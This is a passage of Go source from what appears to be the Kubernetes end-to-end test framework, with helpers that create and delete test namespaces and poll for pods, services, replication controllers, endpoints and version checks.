pvc, err := c.Core().PersistentVolumeClaims(ns).Get(pvcName, metav1.GetOptions{})
if err != nil {
Logf("Failed to get claim %q, retrying in %v. Error: %v", pvcName, Poll, err)
continue
} else {
if pvc.Status.Phase == phase {
Logf("PersistentVolumeClaim %s found and phase=%s (%v)", pvcName, phase, time.Since(start))
return nil
} else {
Logf("PersistentVolumeClaim %s found but phase is %s instead of %s.", pvcName, pvc.Status.Phase, phase)
}
}
}
return fmt.Errorf("PersistentVolumeClaim %s not in phase %s within %v", pvcName, phase, timeout)
}
// CreateTestingNS should be used by every test; note that we append a common prefix to the provided test name.
// Please use NewFramework instead of calling this directly.
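// Example (hypothetical base name and labels; assumes a configured clientset c):
//
//	ns, err := CreateTestingNS("density", c, map[string]string{"team": "perf"})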
func CreateTestingNS(baseName string, c clientset.Interface, labels map[string]string) (*v1.Namespace, error) {
if labels == nil {
labels = map[string]string{}
}
labels["e2e-run"] = string(RunId)
namespaceObj := &v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
GenerateName: fmt.Sprintf("e2e-tests-%v-", baseName),
Namespace: "",
Labels: labels,
},
Status: v1.NamespaceStatus{},
}
// Be robust about making the namespace creation call.
var got *v1.Namespace
if err := wait.PollImmediate(Poll, 30*time.Second, func() (bool, error) {
var err error
got, err = c.Core().Namespaces().Create(namespaceObj)
if err != nil {
Logf("Unexpected error while creating namespace: %v", err)
return false, nil
}
return true, nil
}); err != nil {
return nil, err
}
if TestContext.VerifyServiceAccount {
if err := WaitForDefaultServiceAccountInNamespace(c, got.Name); err != nil {
// Even if we fail to create the serviceAccount in the namespace,
// we have successfully created the namespace.
// So, return the created namespace.
return got, err
}
}
return got, nil
}
// CheckTestingNSDeletedExcept checks whether all e2e based existing namespaces are in the Terminating state
// and waits until they are finally deleted. The namespace named by skip is ignored.
func CheckTestingNSDeletedExcept(c clientset.Interface, skip string) error {
// TODO: Since we don't have support for bulk resource deletion in the API,
// while deleting a namespace we are deleting all objects from that namespace
// one by one (one deletion == one API call). This basically exposes us to
// throttling - currently controller-manager has a limit of max 20 QPS.
// Once #10217 is implemented and used in namespace-controller, deleting all
// object from a given namespace should be much faster and we will be able
// to lower this timeout.
// However, now Density test is producing ~26000 events and Load capacity test
// is producing ~35000 events, thus assuming there are no other requests it will
// take ~30 minutes to fully delete the namespace. Thus I'm setting it to 60
// minutes to avoid any timeouts here.
timeout := 60 * time.Minute
Logf("Waiting for terminating namespaces to be deleted...")
for start := time.Now(); time.Since(start) < timeout; time.Sleep(15 * time.Second) {
namespaces, err := c.Core().Namespaces().List(metav1.ListOptions{})
if err != nil {
Logf("Listing namespaces failed: %v", err)
continue
}
terminating := 0
for _, ns := range namespaces.Items {
if strings.HasPrefix(ns.ObjectMeta.Name, "e2e-tests-") && ns.ObjectMeta.Name != skip {
if ns.Status.Phase == v1.NamespaceActive {
return fmt.Errorf("Namespace %s is active", ns.ObjectMeta.Name)
}
terminating++
}
}
if terminating == 0 {
return nil
}
}
return fmt.Errorf("Waiting for terminating namespaces to be deleted timed out")
}
// deleteNS deletes the provided namespace, waits for it to be completely deleted, and then checks
// whether there are any pods remaining in a non-terminating state.
func deleteNS(c clientset.Interface, clientPool dynamic.ClientPool, namespace string, timeout time.Duration) error {
startTime := time.Now()
if err := c.Core().Namespaces().Delete(namespace, nil); err != nil {
return err
}
// wait for namespace to delete or timeout.
err := wait.PollImmediate(2*time.Second, timeout, func() (bool, error) {
if _, err := c.Core().Namespaces().Get(namespace, metav1.GetOptions{}); err != nil {
if apierrs.IsNotFound(err) {
return true, nil
}
Logf("Error while waiting for namespace to be terminated: %v", err)
return false, nil
}
return false, nil
})
// verify there is no more remaining content in the namespace
remainingContent, cerr := hasRemainingContent(c, clientPool, namespace)
if cerr != nil {
return cerr
}
// if content remains, let's dump information about the namespace, and system for flake debugging.
remainingPods := 0
missingTimestamp := 0
if remainingContent {
// log information about namespace, and set of namespaces in api server to help flake detection
logNamespace(c, namespace)
logNamespaces(c, namespace)
// if we can, check if there were pods remaining with no timestamp.
remainingPods, missingTimestamp, _ = countRemainingPods(c, namespace)
}
// a timeout waiting for namespace deletion happened!
if err != nil {
// some content remains in the namespace
if remainingContent {
// pods remain
if remainingPods > 0 {
// but they were all undergoing deletion (kubelet is probably culprit)
if missingTimestamp == 0 {
return fmt.Errorf("namespace %v was not deleted with limit: %v, pods remaining: %v, pods missing deletion timestamp: %v", namespace, err, remainingPods, missingTimestamp)
}
// pods remained, but were not undergoing deletion (namespace controller is probably culprit)
return fmt.Errorf("namespace %v was not deleted with limit: %v, pods remaining: %v", namespace, err, remainingPods)
}
// other content remains (namespace controller is probably screwed up)
return fmt.Errorf("namespace %v was not deleted with limit: %v, namespaced content other than pods remain", namespace, err)
}
// no remaining content, but namespace was not deleted (namespace controller is probably wedged)
return fmt.Errorf("namespace %v was not deleted with limit: %v, namespace is empty but is not yet removed", namespace, err)
}
Logf("namespace %v deletion completed in %s", namespace, time.Now().Sub(startTime))
return nil
}
// logNamespaces logs the number of namespaces by phase
// namespace is the namespace the test was operating against that failed to delete so it can be grepped in logs
func logNamespaces(c clientset.Interface, namespace string) {
namespaceList, err := c.Core().Namespaces().List(metav1.ListOptions{})
if err != nil {
Logf("namespace: %v, unable to list namespaces: %v", namespace, err)
return
}
numActive := 0
numTerminating := 0
for _, namespace := range namespaceList.Items {
if namespace.Status.Phase == v1.NamespaceActive {
numActive++
} else {
numTerminating++
}
}
Logf("namespace: %v, total namespaces: %v, active: %v, terminating: %v", namespace, len(namespaceList.Items), numActive, numTerminating)
}
// logNamespace logs detail about a namespace
func logNamespace(c clientset.Interface, namespace string) {
ns, err := c.Core().Namespaces().Get(namespace, metav1.GetOptions{})
if err != nil {
if apierrs.IsNotFound(err) {
Logf("namespace: %v no longer exists", namespace)
return
}
Logf("namespace: %v, unable to get namespace due to error: %v", namespace, err)
return
}
Logf("namespace: %v, DeletionTimetamp: %v, Finalizers: %v, Phase: %v", ns.Name, ns.DeletionTimestamp, ns.Spec.Finalizers, ns.Status.Phase)
}
// countRemainingPods queries the server to count number of remaining pods, and number of pods that had a missing deletion timestamp.
func countRemainingPods(c clientset.Interface, namespace string) (int, int, error) {
// check for remaining pods
pods, err := c.Core().Pods(namespace).List(metav1.ListOptions{})
if err != nil {
return 0, 0, err
}
// nothing remains!
if len(pods.Items) == 0 {
return 0, 0, nil
}
// stuff remains, log about it
logPodStates(pods.Items)
// check if there were any pods with missing deletion timestamp
numPods := len(pods.Items)
missingTimestamp := 0
for _, pod := range pods.Items {
if pod.DeletionTimestamp == nil {
missingTimestamp++
}
}
return numPods, missingTimestamp, nil
}
// hasRemainingContent checks if there is remaining content in the namespace via API discovery
func hasRemainingContent(c clientset.Interface, clientPool dynamic.ClientPool, namespace string) (bool, error) {
// some tests generate their own framework.Client rather than the default
// TODO: ensure every test call has a configured clientPool
if clientPool == nil {
return false, nil
}
// find out what content is supported on the server
resources, err := c.Discovery().ServerPreferredNamespacedResources()
if err != nil {
return false, err
}
groupVersionResources, err := discovery.GroupVersionResources(resources)
if err != nil {
return false, err
}
// TODO: temporary hack for https://github.com/kubernetes/kubernetes/issues/31798
ignoredResources := sets.NewString("bindings")
contentRemaining := false
// dump how many of resource type is on the server in a log.
for gvr := range groupVersionResources {
// get a client for this group version...
dynamicClient, err := clientPool.ClientForGroupVersionResource(gvr)
if err != nil {
// not all resource types support list, so some errors here are normal depending on the resource type.
Logf("namespace: %s, unable to get client - gvr: %v, error: %v", namespace, gvr, err)
continue
}
// get the api resource
apiResource := metav1.APIResource{Name: gvr.Resource, Namespaced: true}
// TODO: temporary hack for https://github.com/kubernetes/kubernetes/issues/31798
if ignoredResources.Has(apiResource.Name) {
Logf("namespace: %s, resource: %s, ignored listing per whitelist", namespace, apiResource.Name)
continue
}
obj, err := dynamicClient.Resource(&apiResource, namespace).List(metav1.ListOptions{})
if err != nil {
// not all resources support list, so we ignore those
if apierrs.IsMethodNotSupported(err) || apierrs.IsNotFound(err) || apierrs.IsForbidden(err) {
continue
}
return false, err
}
unstructuredList, ok := obj.(*unstructured.UnstructuredList)
if !ok {
return false, fmt.Errorf("namespace: %s, resource: %s, expected *unstructured.UnstructuredList, got %#v", namespace, apiResource.Name, obj)
}
if len(unstructuredList.Items) > 0 {
Logf("namespace: %s, resource: %s, items remaining: %v", namespace, apiResource.Name, len(unstructuredList.Items))
contentRemaining = true
}
}
return contentRemaining, nil
}
func ContainerInitInvariant(older, newer runtime.Object) error {
oldPod := older.(*v1.Pod)
newPod := newer.(*v1.Pod)
if len(oldPod.Spec.InitContainers) == 0 {
return nil
}
if len(oldPod.Spec.InitContainers) != len(newPod.Spec.InitContainers) {
return fmt.Errorf("init container list changed")
}
if oldPod.UID != newPod.UID {
return fmt.Errorf("two different pods exist in the condition: %s vs %s", oldPod.UID, newPod.UID)
}
if err := initContainersInvariants(oldPod); err != nil {
return err
}
if err := initContainersInvariants(newPod); err != nil {
return err
}
oldInit, _, _ := podInitialized(oldPod)
newInit, _, _ := podInitialized(newPod)
if oldInit && !newInit {
// TODO: we may in the future enable resetting PodInitialized = false if the kubelet needs to restart it
// from scratch
return fmt.Errorf("pod cannot be initialized and then regress to not being initialized")
}
return nil
}
func podInitialized(pod *v1.Pod) (ok bool, failed bool, err error) {
allInit := true
initFailed := false
for _, s := range pod.Status.InitContainerStatuses {
switch {
case initFailed && s.State.Waiting == nil:
return allInit, initFailed, fmt.Errorf("container %s is after a failed container but isn't waiting", s.Name)
case allInit && s.State.Waiting == nil:
return allInit, initFailed, fmt.Errorf("container %s is after an initializing container but isn't waiting", s.Name)
case s.State.Terminated == nil:
allInit = false
case s.State.Terminated.ExitCode != 0:
allInit = false
initFailed = true
case !s.Ready:
return allInit, initFailed, fmt.Errorf("container %s initialized but isn't marked as ready", s.Name)
}
}
return allInit, initFailed, nil
}
func initContainersInvariants(pod *v1.Pod) error {
allInit, initFailed, err := podInitialized(pod)
if err != nil {
return err
}
if !allInit || initFailed {
for _, s := range pod.Status.ContainerStatuses {
if s.State.Waiting == nil || s.RestartCount != 0 {
return fmt.Errorf("container %s is not waiting but initialization not complete", s.Name)
}
if s.State.Waiting.Reason != "PodInitializing" {
return fmt.Errorf("container %s should have reason PodInitializing: %s", s.Name, s.State.Waiting.Reason)
}
}
}
_, c := podutil.GetPodCondition(&pod.Status, v1.PodInitialized)
if c == nil {
return fmt.Errorf("pod does not have initialized condition")
}
if c.LastTransitionTime.IsZero() {
return fmt.Errorf("PodInitialized condition should always have a transition time")
}
switch {
case c.Status == v1.ConditionUnknown:
return fmt.Errorf("PodInitialized condition should never be Unknown")
case c.Status == v1.ConditionTrue && (initFailed || !allInit):
return fmt.Errorf("PodInitialized condition was True but all not all containers initialized")
case c.Status == v1.ConditionFalse && (!initFailed && allInit):
return fmt.Errorf("PodInitialized condition was False but all containers initialized")
}
return nil
}
type InvariantFunc func(older, newer runtime.Object) error
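// Example (assumes events collected from a pod watch; ContainerInitInvariant is
// defined above):
//
//	if err := CheckInvariants(events, ContainerInitInvariant); err != nil {
//		Failf("init container invariants violated: %v", err)
//	}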
func CheckInvariants(events []watch.Event, fns ...InvariantFunc) error {
errs := sets.NewString()
for i := range events {
j := i + 1
if j >= len(events) {
continue
}
for _, fn := range fns {
if err := fn(events[i].Object, events[j].Object); err != nil {
errs.Insert(err.Error())
}
}
}
if errs.Len() > 0 {
return fmt.Errorf("invariants violated:\n* %s", strings.Join(errs.List(), "\n* "))
}
return nil
}
// Waits default amount of time (PodStartTimeout) for the specified pod to become running.
// Returns an error if the timeout occurs first, or if the pod goes into a failed state.
func WaitForPodRunningInNamespace(c clientset.Interface, pod *v1.Pod) error {
if pod.Status.Phase == v1.PodRunning {
return nil
}
return waitTimeoutForPodRunningInNamespace(c, pod.Name, pod.Namespace, PodStartTimeout)
}
// Waits default amount of time (PodStartTimeout) for the specified pod to become running.
// Returns an error if the timeout occurs first, or if the pod goes into a failed state.
func WaitForPodNameRunningInNamespace(c clientset.Interface, podName, namespace string) error {
return waitTimeoutForPodRunningInNamespace(c, podName, namespace, PodStartTimeout)
}
// Waits an extended amount of time (slowPodStartTimeout) for the specified pod to become running.
// Returns an error if the timeout occurs first, or if the pod goes into a failed state.
func waitForPodRunningInNamespaceSlow(c clientset.Interface, podName, namespace string) error {
return waitTimeoutForPodRunningInNamespace(c, podName, namespace, slowPodStartTimeout)
}
func waitTimeoutForPodRunningInNamespace(c clientset.Interface, podName, namespace string, timeout time.Duration) error {
return wait.PollImmediate(Poll, timeout, podRunning(c, podName, namespace))
}
func podRunning(c clientset.Interface, podName, namespace string) wait.ConditionFunc {
return func() (bool, error) {
pod, err := c.Core().Pods(namespace).Get(podName, metav1.GetOptions{})
if err != nil {
return false, err
}
switch pod.Status.Phase {
case v1.PodRunning:
return true, nil
case v1.PodFailed, v1.PodSucceeded:
return false, conditions.ErrPodCompleted
}
return false, nil
}
}
// Waits default amount of time (DefaultPodDeletionTimeout) for the specified pod to stop running.
// Returns an error if timeout occurs first.
func WaitForPodNoLongerRunningInNamespace(c clientset.Interface, podName, namespace string) error {
return WaitTimeoutForPodNoLongerRunningInNamespace(c, podName, namespace, DefaultPodDeletionTimeout)
}
func WaitTimeoutForPodNoLongerRunningInNamespace(c clientset.Interface, podName, namespace string, timeout time.Duration) error {
return wait.PollImmediate(Poll, timeout, podCompleted(c, podName, namespace))
}
func podCompleted(c clientset.Interface, podName, namespace string) wait.ConditionFunc {
return func() (bool, error) {
pod, err := c.Core().Pods(namespace).Get(podName, metav1.GetOptions{})
if err != nil {
return false, err
}
switch pod.Status.Phase {
case v1.PodFailed, v1.PodSucceeded:
return true, nil
}
return false, nil
}
}
func waitTimeoutForPodReadyInNamespace(c clientset.Interface, podName, namespace string, timeout time.Duration) error {
return wait.PollImmediate(Poll, timeout, podRunningAndReady(c, podName, namespace))
}
func podRunningAndReady(c clientset.Interface, podName, namespace string) wait.ConditionFunc {
return func() (bool, error) {
pod, err := c.Core().Pods(namespace).Get(podName, metav1.GetOptions{})
if err != nil {
return false, err
}
switch pod.Status.Phase {
case v1.PodFailed, v1.PodSucceeded:
return false, conditions.ErrPodCompleted
case v1.PodRunning:
return podutil.IsPodReady(pod), nil
}
return false, nil
}
}
// WaitForPodNotPending returns an error if it takes too long for the pod to leave the pending state.
func WaitForPodNotPending(c clientset.Interface, ns, podName string) error {
return wait.PollImmediate(Poll, PodStartTimeout, podNotPending(c, podName, ns))
}
func podNotPending(c clientset.Interface, podName, namespace string) wait.ConditionFunc {
return func() (bool, error) {
pod, err := c.Core().Pods(namespace).Get(podName, metav1.GetOptions{})
if err != nil {
return false, err
}
switch pod.Status.Phase {
case v1.PodPending:
return false, nil
default:
return true, nil
}
}
}
// waitForPodTerminatedInNamespace returns an error if it took too long for the pod
// to terminate or if the pod terminated with an unexpected reason.
func waitForPodTerminatedInNamespace(c clientset.Interface, podName, reason, namespace string) error {
return WaitForPodCondition(c, namespace, podName, "terminated due to deadline exceeded", PodStartTimeout, func(pod *v1.Pod) (bool, error) {
if pod.Status.Phase == v1.PodFailed {
if pod.Status.Reason == reason {
return true, nil
} else {
return true, fmt.Errorf("Expected pod %v in namespace %v to be terminated with reason %v, got reason: %v", podName, namespace, reason, pod.Status.Reason)
}
}
return false, nil
})
}
// waitForPodSuccessInNamespaceTimeout returns nil if the pod reached state success, or an error if it reached failure or ran too long.
func waitForPodSuccessInNamespaceTimeout(c clientset.Interface, podName string, namespace string, timeout time.Duration) error {
return WaitForPodCondition(c, namespace, podName, "success or failure", timeout, func(pod *v1.Pod) (bool, error) {
if pod.Spec.RestartPolicy == v1.RestartPolicyAlways {
return true, fmt.Errorf("pod %q will never terminate with a succeeded state since its restart policy is Always", podName)
}
switch pod.Status.Phase {
case v1.PodSucceeded:
By("Saw pod success")
return true, nil
case v1.PodFailed:
return true, fmt.Errorf("pod %q failed with status: %+v", podName, pod.Status)
default:
return false, nil
}
})
}
// WaitForPodSuccessInNamespace returns nil if the pod reached state success, or an error if it reached failure or did not succeed within PodStartTimeout.
func WaitForPodSuccessInNamespace(c clientset.Interface, podName string, namespace string) error {
return waitForPodSuccessInNamespaceTimeout(c, podName, namespace, PodStartTimeout)
}
// WaitForPodSuccessInNamespaceSlow returns nil if the pod reached state success, or an error if it reached failure or did not succeed within slowPodStartTimeout.
func WaitForPodSuccessInNamespaceSlow(c clientset.Interface, podName string, namespace string) error {
return waitForPodSuccessInNamespaceTimeout(c, podName, namespace, slowPodStartTimeout)
}
// WaitForRCToStabilize waits till the RC has a matching generation/replica count between spec and status.
func WaitForRCToStabilize(c clientset.Interface, ns, name string, timeout time.Duration) error {
options := metav1.ListOptions{FieldSelector: fields.Set{
"metadata.name": name,
"metadata.namespace": ns,
}.AsSelector().String()}
w, err := c.Core().ReplicationControllers(ns).Watch(options)
if err != nil {
return err
}
_, err = watch.Until(timeout, w, func(event watch.Event) (bool, error) {
switch event.Type {
case watch.Deleted:
return false, apierrs.NewNotFound(schema.GroupResource{Resource: "replicationcontrollers"}, "")
}
switch rc := event.Object.(type) {
case *v1.ReplicationController:
if rc.Name == name && rc.Namespace == ns &&
rc.Generation <= rc.Status.ObservedGeneration &&
*(rc.Spec.Replicas) == rc.Status.Replicas {
return true, nil
}
Logf("Waiting for rc %s to stabilize, generation %v observed generation %v spec.replicas %d status.replicas %d",
name, rc.Generation, rc.Status.ObservedGeneration, *(rc.Spec.Replicas), rc.Status.Replicas)
}
return false, nil
})
return err
}
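// WaitForPodToDisappear polls until no pod with the given name matches the label selector.
// Example (hypothetical pod and label; assumes a configured clientset c):
//
//	label := labels.SelectorFromSet(labels.Set{"name": "my-rc"})
//	err := WaitForPodToDisappear(c, "default", "my-pod", label, 2*time.Second, 1*time.Minute)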
func WaitForPodToDisappear(c clientset.Interface, ns, podName string, label labels.Selector, interval, timeout time.Duration) error {
return wait.PollImmediate(interval, timeout, func() (bool, error) {
Logf("Waiting for pod %s to disappear", podName)
options := metav1.ListOptions{LabelSelector: label.String()}
pods, err := c.Core().Pods(ns).List(options)
if err != nil {
return false, err
}
found := false
for _, pod := range pods.Items {
if pod.Name == podName {
Logf("Pod %s still exists", podName)
found = true
break
}
}
if !found {
Logf("Pod %s no longer exists", podName)
return true, nil
}
return false, nil
})
}
// WaitForRCPodToDisappear returns nil if the pod from the given replication controller (described by rcName) no longer exists.
// In case of failure or too long waiting time, an error is returned.
func WaitForRCPodToDisappear(c clientset.Interface, ns, rcName, podName string) error {
label := labels.SelectorFromSet(labels.Set(map[string]string{"name": rcName}))
// NodeController evicts pod after 5 minutes, so we need timeout greater than that to observe effects.
// The grace period must be set to 0 on the pod for it to be deleted during the partition.
// Otherwise, it goes to the 'Terminating' state till the kubelet confirms deletion.
return WaitForPodToDisappear(c, ns, podName, label, 20*time.Second, 10*time.Minute)
}
// WaitForService waits until the service appears (exist == true), or disappears (exist == false)
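// Example (hypothetical service name and timings; assumes a configured clientset c):
//
//	err := WaitForService(c, "default", "my-svc", true, 2*time.Second, 1*time.Minute)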
func WaitForService(c clientset.Interface, namespace, name string, exist bool, interval, timeout time.Duration) error {
err := wait.PollImmediate(interval, timeout, func() (bool, error) {
_, err := c.Core().Services(namespace).Get(name, metav1.GetOptions{})
switch {
case err == nil:
Logf("Service %s in namespace %s found.", name, namespace)
return exist, nil
case apierrs.IsNotFound(err):
Logf("Service %s in namespace %s disappeared.", name, namespace)
return !exist, nil
default:
Logf("Get service %s in namespace %s failed: %v", name, namespace, err)
return false, nil
}
})
if err != nil {
stateMsg := map[bool]string{true: "to appear", false: "to disappear"}
return fmt.Errorf("error waiting for service %s/%s %s: %v", namespace, name, stateMsg[exist], err)
}
return nil
}
// WaitForServiceWithSelector waits until any service with given selector appears (exist == true), or disappears (exist == false)
func WaitForServiceWithSelector(c clientset.Interface, namespace string, selector labels.Selector, exist bool, interval,
timeout time.Duration) error {
err := wait.PollImmediate(interval, timeout, func() (bool, error) {
services, err := c.Core().Services(namespace).List(metav1.ListOptions{LabelSelector: selector.String()})
switch {
case err != nil:
Logf("List service with %s in namespace %s failed: %v", selector.String(), namespace, err)
return false, nil
case len(services.Items) != 0:
Logf("Service with %s in namespace %s found.", selector.String(), namespace)
return exist, nil
default:
Logf("Service with %s in namespace %s disappeared.", selector.String(), namespace)
return !exist, nil
}
})
if err != nil {
stateMsg := map[bool]string{true: "to appear", false: "to disappear"}
return fmt.Errorf("error waiting for service with %s in namespace %s %s: %v", selector.String(), namespace, stateMsg[exist], err)
}
return nil
}
// WaitForServiceEndpointsNum waits until the number of endpoints that implement the service equals expectNum.
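// Example (hypothetical service and expected endpoint count; assumes a
// configured clientset c):
//
//	err := WaitForServiceEndpointsNum(c, "default", "my-svc", 3, 2*time.Second, 1*time.Minute)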
func WaitForServiceEndpointsNum(c clientset.Interface, namespace, serviceName string, expectNum int, interval, timeout time.Duration) error {
return wait.Poll(interval, timeout, func() (bool, error) {
Logf("Waiting for amount of service:%s endpoints to be %d", serviceName, expectNum)
list, err := c.Core().Endpoints(namespace).List(metav1.ListOptions{})
if err != nil {
return false, err
}
for _, e := range list.Items {
if e.Name == serviceName && countEndpointsNum(&e) == expectNum {
return true, nil
}
}
return false, nil
})
}
func countEndpointsNum(e *v1.Endpoints) int {
num := 0
for _, sub := range e.Subsets {
num += len(sub.Addresses)
}
return num
}
// WaitForReplicationController waits until the RC appears (exist == true), or disappears (exist == false)
func WaitForReplicationController(c clientset.Interface, namespace, name string, exist bool, interval, timeout time.Duration) error {
err := wait.PollImmediate(interval, timeout, func() (bool, error) {
_, err := c.Core().ReplicationControllers(namespace).Get(name, metav1.GetOptions{})
if err != nil {
Logf("Get ReplicationController %s in namespace %s failed (%v).", name, namespace, err)
return !exist, nil
} else {
Logf("ReplicationController %s in namespace %s found.", name, namespace)
return exist, nil
}
})
if err != nil {
stateMsg := map[bool]string{true: "to appear", false: "to disappear"}
return fmt.Errorf("error waiting for ReplicationController %s/%s %s: %v", namespace, name, stateMsg[exist], err)
}
return nil
}
// WaitForReplicationControllerwithSelector waits until any RC with given selector appears (exist == true), or disappears (exist == false)
func WaitForReplicationControllerwithSelector(c clientset.Interface, namespace string, selector labels.Selector, exist bool, interval,
timeout time.Duration) error {
err := wait.PollImmediate(interval, timeout, func() (bool, error) {
rcs, err := c.Core().ReplicationControllers(namespace).List(metav1.ListOptions{LabelSelector: selector.String()})
switch {
case err != nil:
Logf("List ReplicationController with %s in namespace %s failed: %v", selector.String(), namespace, err)
return false, nil
case len(rcs.Items) != 0:
Logf("ReplicationController with %s in namespace %s found.", selector.String(), namespace)
return exist, nil
default:
Logf("ReplicationController with %s in namespace %s disappeared.", selector.String(), namespace)
return !exist, nil
}
})
if err != nil {
stateMsg := map[bool]string{true: "to appear", false: "to disappear"}
return fmt.Errorf("error waiting for ReplicationControllers with %s in namespace %s %s: %v", selector.String(), namespace, stateMsg[exist], err)
}
return nil
}
func WaitForEndpoint(c clientset.Interface, ns, name string) error {
for t := time.Now(); time.Since(t) < EndpointRegisterTimeout; time.Sleep(Poll) {
endpoint, err := c.Core().Endpoints(ns).Get(name, metav1.GetOptions{})
if apierrs.IsNotFound(err) {
Logf("Endpoint %s/%s is not ready yet", ns, name)
continue
}
Expect(err).NotTo(HaveOccurred())
if len(endpoint.Subsets) == 0 || len(endpoint.Subsets[0].Addresses) == 0 {
Logf("Endpoint %s/%s is not ready yet", ns, name)
continue
} else {
return nil
}
}
return fmt.Errorf("Failed to get endpoints for %s/%s", ns, name)
}
// Context for checking pods responses by issuing GETs to them (via the API
// proxy) and verifying that they answer with their own pod name.
type podProxyResponseChecker struct {
c clientset.Interface
ns string
label labels.Selector
controllerName string
respondName bool // Whether the pod should respond with its own name.
pods *v1.PodList
}
func PodProxyResponseChecker(c clientset.Interface, ns string, label labels.Selector, controllerName string, respondName bool, pods *v1.PodList) podProxyResponseChecker {
return podProxyResponseChecker{c, ns, label, controllerName, respondName, pods}
}
// CheckAllResponses issues GETs to all pods in the context and verifies that
// they reply with their own pod name.
func (r podProxyResponseChecker) CheckAllResponses() (done bool, err error) {
successes := 0
options := metav1.ListOptions{LabelSelector: r.label.String()}
currentPods, err := r.c.Core().Pods(r.ns).List(options)
Expect(err).NotTo(HaveOccurred())
for i, pod := range r.pods.Items {
// Check that the replica list remains unchanged, otherwise we have problems.
if !isElementOf(pod.UID, currentPods) {
return false, fmt.Errorf("pod with UID %s is no longer a member of the replica set. Must have been restarted for some reason. Current replica set: %v", pod.UID, currentPods)
}
subResourceProxyAvailable, err := ServerVersionGTE(SubResourcePodProxyVersion, r.c.Discovery())
if err != nil {
return false, err
}
ctx, cancel := context.WithTimeout(context.Background(), SingleCallTimeout)
defer cancel()
var body []byte
if subResourceProxyAvailable {
body, err = r.c.Core().RESTClient().Get().
Context(ctx).
Namespace(r.ns).
Resource("pods").
SubResource("proxy").
Name(string(pod.Name)).
Do().
Raw()
} else {
body, err = r.c.Core().RESTClient().Get().
Context(ctx).
Prefix("proxy").
Namespace(r.ns).
Resource("pods").
Name(string(pod.Name)).
Do().
Raw()
}
if err != nil {
if ctx.Err() != nil {
// We may encounter errors here because of a race between the pod readiness and apiserver
// proxy. So, we log the error and retry if this occurs.
Logf("Controller %s: Failed to Get from replica %d [%s]: %v\n pod status: %#v", r.controllerName, i+1, pod.Name, err, pod.Status)
return false, nil
}
Logf("Controller %s: Failed to GET from replica %d [%s]: %v\npod status: %#v", r.controllerName, i+1, pod.Name, err, pod.Status)
continue
}
// The response checker expects the pod's name unless !respondName, in
// which case it just checks for a non-empty response.
got := string(body)
what := ""
if r.respondName {
what = "expected"
want := pod.Name
if got != want {
Logf("Controller %s: Replica %d [%s] expected response %q but got %q",
r.controllerName, i+1, pod.Name, want, got)
continue
}
} else {
what = "non-empty"
if len(got) == 0 {
Logf("Controller %s: Replica %d [%s] expected non-empty response",
r.controllerName, i+1, pod.Name)
continue
}
}
successes++
Logf("Controller %s: Got %s result from replica %d [%s]: %q, %d of %d required successes so far",
r.controllerName, what, i+1, pod.Name, got, successes, len(r.pods.Items))
}
if successes < len(r.pods.Items) {
return false, nil
}
return true, nil
}
// ServerVersionGTE returns true if v is greater than or equal to the server
// version.
//
// TODO(18726): This should be incorporated into client.VersionInterface.
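// Example (hypothetical minimum version; assumes a configured clientset c):
//
//	gte, err := ServerVersionGTE(utilversion.MustParseSemantic("v1.5.0"), c.Discovery())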
func ServerVersionGTE(v *utilversion.Version, c discovery.ServerVersionInterface) (bool, error) {
serverVersion, err := c.ServerVersion()
if err != nil {
return false, fmt.Errorf("Unable to get server version: %v", err)
}
sv, err := utilversion.ParseSemantic(serverVersion.GitVersion)
if err != nil {
return false, fmt.Errorf("Unable to parse server version %q: %v", serverVersion.GitVersion, err)
}
return sv.AtLeast(v), nil
}
func SkipUnlessKubectlVersionGTE(v *utilversion.Version) {
gte, err := KubectlVersionGTE(v)
if err != nil {
Failf("Failed to get kubectl version: %v", err)
}
if !gte {
Skipf("Not supported for kubectl versions before %q", v)
}
}
// KubectlVersionGTE returns true if the kubectl version is greater than or
// equal to v.
func KubectlVersionGTE(v *utilversion.Version) (bool, error) {
kv, err := KubectlVersion()
if err != nil {
return false, err
}
return kv.AtLeast(v), nil
}
// KubectlVersion gets the version of kubectl that's currently being used (see
// --kubectl-path in e2e.go to use an alternate kubectl).
func KubectlVersion() (*utilversion.Version, error) {
output := RunKubectlOrDie("version", "--client")
matches := gitVersionRegexp.FindStringSubmatch(output)
if len(matches) != 2 {
return nil, fmt.Errorf("Could not find kubectl version in output %v", output)
}
// Don't use the full match, as it contains "GitVersion:\"" and a
// trailing "\"". Just use the submatch.
return utilversion.ParseSemantic(matches[1])
}
func PodsResponding(c clientset.Interface, ns, name string, wantName bool, pods *v1.PodList) error {
By("trying to dial each unique pod")
label := labels.SelectorFromSet(labels.Set(map[string]string{"name": name}))
return wait.PollImmediate(Poll, podRespondingTimeout, PodProxyResponseChecker(c, ns, label, name, wantName, pods).CheckAllResponses)
}
func PodsCreated(c clientset.Interface, ns, name string, replicas int32) (*v1.PodList, error) {
label := labels.SelectorFromSet(labels.Set(map[string]string{"name": name}))
return PodsCreatedByLabel(c, ns, name, replicas, label)
}
func PodsCreatedByLabel(c clientset.Interface, ns, name string, replicas int32, label labels.Selector) (*v1.PodList, error) {
timeout := 2 * time.Minute
for start := time.Now(); time.Since(start) < timeout; time.Sleep(5 * time.Second) {
options := metav1.ListOptions{LabelSelector: label.String()}
// List the pods, making sure we observe all the replicas.
pods, err := c.Core().Pods(ns).List(options)
if err != nil {
return nil, err
}
created := []v1.Pod{}
for _, pod := range pods.Items {
if pod.DeletionTimestamp != nil {
continue
}
created = append(created, pod)
}
Logf("Pod name %s: Found %d pods out of %d", name, len(created), replicas)
if int32(len(created)) == replicas {
pods.Items = created
return pods, nil
}
}
return nil, fmt.Errorf("Pod name %s: Gave up waiting %v for %d pods to come up", name, timeout, replicas)
}
func podsRunning(c clientset.Interface, pods *v1.PodList) []error {
// Wait for the pods to enter the running state. Waiting loops until the pods
// are running so non-running pods cause a timeout for this test.
By("ensuring each pod is running")
e := []error{}
errCh := make(chan error)
for _, pod := range pods.Items {
go func(p v1.Pod) {
errCh <- WaitForPodRunningInNamespace(c, &p)
}(pod)
}
for range pods.Items {
err := <-errCh
if err != nil {
e = append(e, err)
}
}
return e
}
func VerifyPods(c clientset.Interface, ns, name string, wantName bool, replicas int32) error {
return podRunningMaybeResponding(c, ns, name, wantName, replicas, true)
}
func VerifyPodsRunning(c clientset.Interface, ns, name string, wantName bool, replicas int32) error {
return podRunningMaybeResponding(c, ns, name, wantName, replicas, false)
}
func podRunningMaybeResponding(c clientset.Interface, ns, name string, wantName bool, replicas int32, checkResponding bool) error {
pods, err := PodsCreated(c, ns, name, replicas)
